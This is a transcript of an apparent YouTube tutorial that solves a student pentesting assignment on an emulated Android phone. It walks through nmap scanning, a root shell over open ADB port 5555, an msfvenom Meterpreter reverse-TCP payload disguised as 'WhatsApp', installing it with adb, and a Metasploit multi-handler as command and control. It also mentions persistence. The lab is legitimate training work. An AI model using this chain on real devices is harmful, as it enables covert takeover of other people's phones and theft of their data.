A Softek IT Consult.
Hello everyone, welcome to A Softek IT Consult. In today's video or in today's episode, we are going to continue our penetration testing and ethical hacking. Today, we are going to work on some of the semester-based project that has been given. Okay, that's final year semester-based project, but it is actually an assignment that is really good to test your skills, to learn something new, and then to add up to your knowledge already. Okay, so looking at this, you can see we have an assignment which says we should design a malware, okay, for exploitation. In that particular design malware should bypass the antivirus, and then we should show proof of exploitation and also document the processes, right? And then we should also include the defense and recommendations and the presence of the malware. All right. So I think it is the same question that has been framed in here. This one says if you take any device of your choice with any operating system of your choice and do a pen testing and also design a malware, be sure not to disable the antivirus of the device. So it is the same question that has been paraphrased. You understand? Just that the second one makes a specificity or specifications that we should take any device which can be Windows, which can be Linux, which can be Android, which can be iOS, which can be Mac OS, anything, right? And then we should do pen testing, and after we should design a malware, and then we should be able to use the malware on it without touching antivirus or anything. So we are going to do this particular question, which I will tackle the second one first before, even though it is the same thing, right? But I'm going to do it in two different series of videos. So I will do this particular video for this particular one. Yes, for this particular one. Yes, I'm going to do this for this particular one. The next video will be on this particular one. Yes, so let's get started. All right, so we will select Android and then we will be doing our pen testing on Android. So let's power on our virtual machines, and I'm going to turn on Windows 10 because what I want to do, I've done it on my Windows 11, so you may not really see most of the stuff, but if I do it in the Windows 10, you will see everything. So I'm going to start from this way. Let me go full screen. This one says we should please wait. Let's wait. We are going to set up an Android device in this particular Windows 10, but I want to show you all the process so that we don't miss anything. Okay, making it look like I did it and then it worked, but when you were doing it at your end and then it didn't. Okay, I just want to make it raw for us to understand everything that is happening so far. Okay, so we are in, right? So first things first, I'm going to open the browser. You know, this particular PC has antiviruses, right? Yes. And then they are all working. So I'm going to open the browser. I'm going to go to google.com. Okay, so here I'm going to type what? Download Genymotion. Yes, this one. So I'll click on this one, the desktop version. All right, so I'm going to click on what? The Windows 10, this one. So I'll click on Windows because of the browser. Okay, don't worry. So let me just pause this. Let's look at from the downloads. Right, this is, it was almost downloaded, but I already have it in here. I should show you the folder. Okay, let me close this one. Yes, let's close everything. Let me see. Do I have it? Okay, so I don't have it. I thought I had it. Then let's continue with the download. Download. And this is what I'm going to do. I'm going to copy it, right? I'll copy it from my Windows and then I'm going to bring it. Okay, so I'm going to copy Genymotion from here. Yes, this one. I'm going to move it right here so that we don't waste data. Okay, that we don't waste data. Okay, so let me double click on this. Let's install. So we click on this. We go to next. We use next. We use next. We use next on all. We wait for it to finish installing. So immediately it finishes, it actually asks you to install a VirtualBox automatically. So you have to install because it runs with VirtualBox. So we go to next, we go to next, we go to next, and then yes, we install. So this is what VirtualBox 7.026. All right. Yeah. So let me open this. It says restart now. I'll restart later after the video. Don't worry. But you can do it, okay, at that particular point. I want us to add some add-ons to VirtualBox, okay, to make it run even better. So let me get back to google.com. Yes, I'll say download VirtualBox, okay, VirtualBox add-ons. I'll say this is it was 7.0.26, right, like this, and I'll visit this particular site. Oh, this site is off. Okay, this one. Yes, this one. Yes. So looking at this, you download this particular one, right? It is 80 megabyte. I click on this. Yes, it is downloading. Download complete. Okay. View download. Download complete. Let's get in here. Downloads. You can see this is it. Right. If I double click on it, yes, I say it's installed. So let me install in. So you scroll down and then I agree. Okay, so it is installed. It is installed in this. Right, if you want to see, you can see it from here, extensions. Okay, so that is that. So now we have it installed. We can close it. Let's open the Genymotion. This is it, this one. We can even delete this one, right? So we open this one. It is suspecting a particular file as a virus, and I'm sure it's found it. Because I was actually working on some viruses in here. So in here, he says we should log in. But in case you don't have an account, you can click here because you have to set up an account before you can use it. So let's visit. Yeah, so here you are going to type in your email address, right? Whatever that it is. Okay, you just type it in. If it is at Gmail, you just put it in there. And then here, the usage type, you can just say what's the name? I think we have development and testing. All right, yes, let's do it that way. And then here, password, you can just put in your password. Company type, here you can say security. All right, and then here, country, you can say Ghana. Right here, you can decide to put it or not. And then you accept, and then here you accept, and then this one opens because I haven't really filled up most of the things, so it is not going to allow me. Look at this, okay? So you just create account and then you verify from your mail. Okay, so after you come, then you can come and now log in. After you verify, you can come and now log in. So I have one that I created this way. Yeah, so I'm logging in. Okay, yes. So you see, and then here you select personal account. You agree, and then select here. So we've been able to install our Android emulator. So what next? We have to create the device. Okay, either we create Samsung, we create Google, we create any of them we have in here. So maybe I would say let's create Galaxy S23. We can even create S10, any of them. You click on next. Here, yes, it's this Android version. Maybe I'll pick maybe 10 or maybe 11. Let me see 11. Okay, let's use 11. And then here we click on next. Here in processor, I'll reduce this to somewhere 2. Here I'll reduce this to somewhere, let's say 2 gig. Okay, 2 gig or 4 gig, depending on what you have. Right, I'm going to click on next. Here, this is the screen. So you decide the screen you want to have in there. So I'm going to click on next. I'm going to click on next. And then here should remain as NAT, but later on we are going to change to bridge, right? You will get to understand what I mean. So let me click on install. So it is actually creating the device. Okay, we'll be having our Galaxy S23 ready very soon. So let's wait for a while whilst it creates. So we are actually done with creating our device. So mind you, okay, you can create any device at all. You can create what any device at all you want to. Okay, any of them you can create. Okay, but when creating, okay, let me tell you one particular thing about this whole thing. Assuming maybe we are creating maybe any maybe Nexus 6. Let's assume Nexus 6 like this. Okay, when you go in here, look at this. It says what? Root. This feature requires a paying license. You understand? So if you don't have a pay license, you can't have a root here. I realized that all of the root accesses were on from the Android. Let me see. I think Android 11 downwards. Okay. Yes. So if you use the versions which from 11 downwards, meaning everything I'm doing is going to work in every device that you pick. All right. So you should make sure that is what done. So since we've created, we now have the the device created. So the next thing I would like to help do, okay, or explain is this. When I open this, you can see that the device is now showing in here. Let me open full screen. It's now showing in here. When I click on it and then when I go to settings, we'll be doing some few settings in here. On the system, the processor is showing. You can the memory is here. You can increase or decrease. Okay, processor is also right here. You can increase or decrease when it is in your original Windows 11 machine or Windows 10 machine, right? Here you have to enable this. You have to enable this as well. Okay, acceleration. Here, change this one. Then you make it KVM. All right. Yes, I'm showing you how it is going to run quickly and faster. And then here I'm going to increase this to 128. Okay, and then here you enable this. All right, you enable this acceleration. And then when we go to a network, you make sure you leave this one like this. This is going to communicate with the Windows 11 to get internet from the Windows 11. And then this one, we're going to change this and then we'll make it bridged. And then you select your adapter. Okay, you may find yours maybe Wi-Fi something or something. You select this. This is going to communicate with our VMware. Okay, because I'm going to use Kali on VMware. I'm not using Kali in VirtualBox, right? And after you click on OK, so that is set. Okay, so this is how we set up the Genymotion devices and then we create them. So I'm going to minimize this and then we go to our original PC. But before, let me turn on my Kali Linux. You can also turn on your Kali Linux that way. So whilst it is powering on, let me show you the actual this one in here that I have. Okay, so I created. So when do it on your original Windows machine. Don't do it in the VM. I only did it in the VM so that you see the steps I use in doing it. Because I've done it already. When I show it to you on my Windows 11, you may not understand. That is why I went to the VM, right? So here I created Galaxy S10 and then so that is what I've actually done. And then let me open the VirtualBox for you to also see VirtualBox here. Yeah, this is Galaxy S10. I go to settings. You see that the same settings I was talking about, I've done it. This one, okay, you enable this too. Here, KVM. Here, network, okay, host only. Here is what bridge. So look at this. You see, so this one is my actual Wi-Fi adapter in my machine. That is why I have it here. You get it. So, and then the display, 128. This is what enabled, okay, everything. So I can even close this one. And let me open the device, okay? Let me open the device so that we kickstart. Let me check whether the okay Kali is on. Let me open this while the device is also opening. Okay, that is loading. Kali is also loading. So Kali has actually loaded. I think the device is also actually loaded. Now you update and then you upgrade. Let me open Kali as a root terminal. You update and then you upgrade. All right, yeah. So here I'm going to just what update. Okay, do apt update. But you can do it this way and then apt upgrade. But I'm not going to do because it's going to take a lot of time. I don't want to keep us here. And then let me just update. Let me just update here this way. And then let me see this one. So our Android has opened. Okay. So our Android has actually opened. Yes. So you can see. So this is how it is going to look like. All right. So everything is working in the Android. Yes, and then you can see the devices I can pull down. Okay, the brightness. Okay, everything is working like just normal Android device. Internet is working. Everything is working. You can navigate. You can go to settings. You can everything is actually working. All right, so let's access the internet and let's see. Let me go here and let me just type Ghana. Click on this. If it loads, you can tell that there is internet connectivity. So let's wait to see. Okay, so we have internet connectivity. Now look at this. Let me show you something. Um, can you see the IP address written on top? 192.168.191.103.555. That is the IP address. Okay, so this is the host only. This is what it is using to communicate with what's the name? The host that is Windows 11. Okay, but it is using another IP address to communicate with the Kali. And I'll tell you one thing, okay? Let me go in here. So before you even start the Kali, I didn't do that. Before you start the Kali, I'll advise that for it to work properly, realize that your Kali would be having nuts, right? Change it and then make it bridged, right? So make it bridged, right? And then you click OK. And then you restart it, right? You restart it because this bridged is going to make the Kali access the external networks. Right now, if it is not, it is using the Windows 11 network. But if it is bridged, it is using its own network outside. So you realize that we did also bridge for the Galaxy phone that we created, right? So that is what you will be doing. So let's go and check the other IP address it is using. Okay, so here I type for Genymotion. I go to open file location. Here I go to open file location. I visit tools. Okay, here in this particular folder, I'm going to click top here. I'm going to delete this. I'm going to write CMD. Okay, so here I write ADB devices. I want to check the devices of Android on this particular. I have one. Was it the same thing as this one? Okay, let's check the IP address. Yes, 103 is the end. So let's see. We also have 103. Yes, so that's it. So let's connect. Let's connect to this device. ADB what? Connect 192.168.191.103. Okay, 5555. That is the port. Already connected. All right, so we are connected already. Let's go and check the IP address. We'll say ADB and Android debugging bridge, and then we'll say shell. All right. So here, yes, we are in the terminal. So we write ifconfig, and then here we have what? Interfaces, okay, for the internet. We have ET0, WLAN 0, okay, the radio 0, okay. So in here, you should start testing from the top, I think, but always, I think, the first one. But sometimes on other devices, it can be this one or this, okay. But I'm sure this one, this is the other IP address that it is using, okay, because look at this, 192.168.0, right? If I check the IP address of our Kali, 192.168.0, right? Yeah, so that is, they are on the same network. So let's see whether we can ping 192.168.0.167. Okay, so it is pinging. Let's also ping the Kali from there, and then let's see. Okay, let's ping 192.168.0.175. That was my Kali's address. It is also working, meaning they are communicating together. Right. So I'm going to close this, and then let's start our pen testing. Right. So we've done actually one of the attacking vector. Okay, or the attacking chain. That is what reconnaissance footprinting. Okay, let's do enumeration and scanning here. So let me open this one boldly for you to see. I'm going to write Nmap. Okay, Nmap, I'm going to do aggressive scanning. Verbose for you to see the details. Here we want to see the operating system that is being used. Okay, so, no. Let me get back. No. Operating system that was being used. Okay, and then yes, that was the IP address. So I'm going to click on this. It is actually going to load. But you see, look at this. This one says discovered what? Open port. That is 24800. Okay, running on TCP, and then 5555. Okay, these are open port, meaning we can exploit this two port. This particular port is what? Android debugging bridge. And then this particular one is also running certain services. Okay, yes. But before we can exploit, we have to know the services these guys are running, and we'll have to wait for this to complete. This is going to take a little bit of time, but since what we actually know the open port, let's try our first attempt. So if we have open port this way, okay, per our enumeration, let's assume we know the device, but after everything finishes loading, we will see the kind of device, operating system, the name, the version, everything, the services that is running. Let's wait. I don't want to skip anything. Let's wait for it to complete. So we are done with that. Let's look at this. We are done with that. Let's read it. Okay, let's read the logs and let's see. So this one is done. The OS information says Android. Okay, it says yes. OS details Sony Android TV. Even though it is saying Android TV, but it is Android. As we know. And then here says port 5555 TCP, and then the services it is running is ADB, Android debugging shell, meaning we can log in into this, right? And then it says it is Android debug bridge device. These are some of the services that are running. Like this is the name of the user. That is the root. This is the model is Galaxy S10. The device is what Vinbox, the same person. Then we have another open port, okay, here, but here we don't know the service. So I think we'll only exploit the one that we know the service, which is ADB. ADB is very easy or is very good. That anytime you find an open port like ADB on an Android phone, it is always going to be exploited. So let's do that. Let me clear the screen from here. Since we know that it is ADB, I'm going to write ADB device. Okay, let me check. Okay, it says what? Daemon started successfully. Right. So the devices, let me write this 192.168.0.1. Was this 105? Let me recheck. I think it was 105 if I'm right. I also closed this. Oh, okay. I think I can find it here since I typed some commands. 167. Yes, 167. 167. Let me try and see. Oh, I think it's ADB devices list. Okay. Yes, it is trying to tell us we don't really have that particular thing, but we know that this particular device is an Android device. So let's try connect and let's see. Right, ADB connect 192.168.0.167 and then 5555. You see, it's connected. So we are connected to the device. Now let's open the shell, ADB shell. Okay, we are in. Let's say, who am I? Root. Oh, then let's go to our device and let's check also as well. Let's see. Um, Interesting, right? Yes. Some CMD. Here we'll say what ADB shell. Okay, let me check. Who am I? Oh, it also says root. Okay, let's say ID. It ends with what? SUSU. Okay. It means that truly connected to the device. Okay, ID, SUSU. That is correct. Okay, so let me look at what is in this device. We actually have SD card, we have SBIN. Okay, let me check if truly we have SD card SBIN. Opening this particular device from here. I click on the home. Let me go to the files. Okay, this is S10 here. Okay, let me go to recent. Okay, so we have these ones right here. I think this is the SD card. This is the SD card because if we want to really see, I think we should use this particular one, which can show us those particular things. Yes, some things like this. Yeah, that is the internal storage. Yes. So see the storage emulated. So that is that. So let's do this. When we go back to the question, remember the question was saying something that after we've done what all of these particular things, okay, yes, we've been able to bypass the device. We don't really care whether there was antivirus or there wasn't, because the device, every device should be having what some kind of security. Even in Android, right, when you are installing some device, it will tell you some applications, this application, okay, is not from the Play Store. So do you want to, that is a verification, a signature, right? So they are all in the devices, right? So yes, so we've done with this. All right, and then we will see, and now it's left with the malware. Now it's left with the malware. So we've done the exploitation, left with the malware that we are going to create, and then here too we've done this particular part. It's left with the malware that we are going to design. Okay, so let's go design the malware. That's what we are going to do. So I'm going to what to go out of here. I'm going to design a malware for Android. Right, I'm going to say msfvenom. I'm going to say payload should be Android. Android should be Meterpreter, and then we should have the reverse TCP connection. L host should be like this: 192.168.0.167. Oh no, should be 175. Right, that is me. Okay, and then L port should be 4444, and then we'll say let's create what this way raw. And then, yes, this is a raw file. So put all of the raw files into this particular name. And then let's create it. Let's create this backdoor. Okay, it is created. It is created. Okay, that is one megabyte. Let's see whether truly it is created. Says WhatsApp. So look at it. This is it. It's here. Right now, we have to transfer this particular file. Okay, so I'm going to say adb push. Okay, WhatsApp. I'm going to say SD card. All right, I'm going to push it into the SD card. Okay, so it says what? Pushed successfully. Let's see whether it's in. And I think since it is successful, then meaning it's in. Let's see. Look at it. This is it. This is the file. Just right now, 10:59. Look at our time, 10:59. Yes, 10:59 is true. So it is pushed. So right now, let's go and install it. Okay, so we do adb shell. We go back to the Android device. Let me clear the screen, and then let me say ls. Okay, so here I'm going to say package manager. Okay, we actually do install package manager install. We go to the SD card. Okay, SD card, and then we select the application WhatsApp. I think it is capital W, like this. Yes, and then we click on enter. Okay, so it says success, which means we've installed the application. Right, it says success, which means we've installed the application. Let's see whether an application has been installed. That's interesting. I see. Okay, so this is it. And I think you can see an application which looks weird. Alright, this one. As I said, we didn't really create an app. It was just something we generated, but we could use a normal application which will work like this. But just to run up this particular assignment quickly, because it has taken a lot of time, a lot of investment, a lot of research, a lot of dedication in coming by with this particular solution. Right? Yes, it hasn't been really that easy. Okay, so just don't want to complicate and make things really longer, and then the video also very longer. Just make it so we can see that this is the particular file. Okay, so how then do we get a reverse connection? Now the malware is on the person's phone. Even though we've been able to access the person, the phone right from here. Okay, I would like us to open another terminal. Okay, which we are going to create a command and control, so that even if we lose this particular one, we can be controlling the person's phone anywhere the person moves to. I'm going to use msf console. Okay, and I'm going to use a multi-handler exploit. And then, so I'm going to use the multi-handler. I'm going to use the exploit multi-handler. And I'm going to set our payload as here. We're going to say Android. Yes, let's make it Android because it is Android. And then the Meterpreter. And then here, reverse TCP like this. I'm going to set lhost 192.168.0, like the same thing we did for the first one. And then here it is 175. And then here we're going to set lport 4444. It will be the same. And then here we're going to run. So our command and control server is what is running behind the scene. So assuming maybe you are the owner of this particular phone, okay, this particular phone, and then maybe somebody sent you an application, or maybe downloaded it from a particular website, and then you also want to install, right? Maybe this one we even installed. So this one we even installed. But assuming maybe you opened, maybe you may have some applications on your phone that you will know that you're not the one who actually installed it, but it is installed. And in case of curiosity, you want to go and open and see what is in. This is what can happen. So let's open this application. I've opened this application. It says, oh, continue, everything, continue. So you see, these are permissions, permissions. So always be vigilant when working with devices with permissions. Okay, continue. The application, so this app was built for an older version of Android. It may not work properly. Try checking for update. You see what happened? Now let's go and check our Kali. Ooh, we have a connection back. What happened? Let's see system info. Okay, it says this is an Android version 11. Okay, let's check. Who am I? Remember? Okay, who am I is not working in this. Okay, but let me check. ls cd, let's go to the root. Okay, ls, we can see the SD card is also right here. Let's visit SD card this way. Can tell that we have that. So meaning we are now into the application. We can also run persistence so that the person, where anytime the phone is on, the application will be running. So this actually brings us to the end of this assignment. We've actually exhausted the question. Okay, we've done everything the 2 questions were requiring from us. Okay, we've done this and then we've done that. Okay, but I'm going to dedicate this particular video to the second one actually. Okay, it's the same thing, but yes, I'm going to do another one, okay, which is going to be on Windows. But this is absolutely correct. It has been absolutely fantastic, and I know it has been amazing. So when you take it on, I know you are going to navigate, you'll be testing things, and then you'll be also trying to figure out, maybe trying something new, you understand. But don't go yet. If you haven't subscribed to our YouTube channel, please go in there, turn on the notification bell so that anytime we release a new video, you'll be the first person to receive the notification and then watch and then gain knowledge such as this, okay, and then gain the skills such as these to be able to navigate, okay, in your profession. Until we meet again, bye for now.
For more information and also to reach us, please contact the numbers on the screen. You can also reach us through our social media handles displayed on the screen. Please do like, follow, and subscribe to our social media handles. A Softek IT Consult. Innovative solutions with the difference.